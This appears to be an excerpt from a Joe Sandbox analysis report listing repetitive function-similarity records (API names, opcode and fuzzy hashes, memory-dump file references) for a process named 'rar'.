                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                                                • Instruction ID: 80b03a6e3d2edfe1f54011cea8f95ba4f7629a3da408b9d38179ed05016a538e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99014821A18A4282EF608BB8EC823786350EB54778F144B71D63C961E0CF7CE48AC741
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1175261203-0
                                                                                                                                                                                                                                                                • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                                                • Instruction ID: 6c417f769ef066ace565acd169bb57044a663a894fb8e1678183e8019d283247
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5F01221B1858246FE709B20EC563FA6264BF9C784F804072E9CDE6799EF2CD6488B51
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: ddbf2ba4f4fd47b9c365c7d5243f57a0975949615863d2f12eed567bd6091adb
                                                                                                                                                                                                                                                                • Instruction ID: f3f043d1a47b6db7de4c5af2da89fd94a7b638f5107d3a1b7a1ad4096f2c714e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddbf2ba4f4fd47b9c365c7d5243f57a0975949615863d2f12eed567bd6091adb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8AE1C272A0868241FF219B2098472BE6751EF41F88F4441B6DECDAB7D6DF2DE849C712
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f9e8ef509cf6c131bd0f799b7968fd127fe3009836c6d6a2c7defeaf5bae96b7
                                                                                                                                                                                                                                                                • Instruction ID: fe606c840b88172d474afd64e673c5a920d19f650bd2abb65aed8d22127edf2a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9e8ef509cf6c131bd0f799b7968fd127fe3009836c6d6a2c7defeaf5bae96b7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67514773518BD294EB009F74E8451ED37A8F744F88F18427ADE884BB9ADF389055C322
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                                                • Instruction ID: 9df4489e203e61916bc0297722242679f0e87888581db1974e14e57b6fa3e87d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B419261A1968382FF689B15DC521B96391AF84744F0044B7D9CDEB6E2DF3CE84D8742
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CompareString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1825529933-0
                                                                                                                                                                                                                                                                • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                                                • Instruction ID: 9f0c7ac8ddb738c8c51e0b769a56bf3ff01aa8e9e127e6cc120244d5128c4104
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB01626170C69245EE10AF12B8060BAE611BB99FC0F584876EFCDABB5ACF3CD4864705
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                                • Instruction ID: a97db0cbc040c11eb10af2b4a04e6cb47fe4deec50a16a879ce5f4810b000a70
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4E0BF50F1D30741ED5926621D930B902401F5AB81E5564FACD9FB63C2DF1DE45D5B22
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                                                • Instruction ID: 93e9473ebf6dd243b4f9c3b8268acebf53fba6ef2cc622a94b4023a5ab4b967a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0F46290834244FF248BA0E8823746650DB10B78F585771DA7E910D4CF28C897C792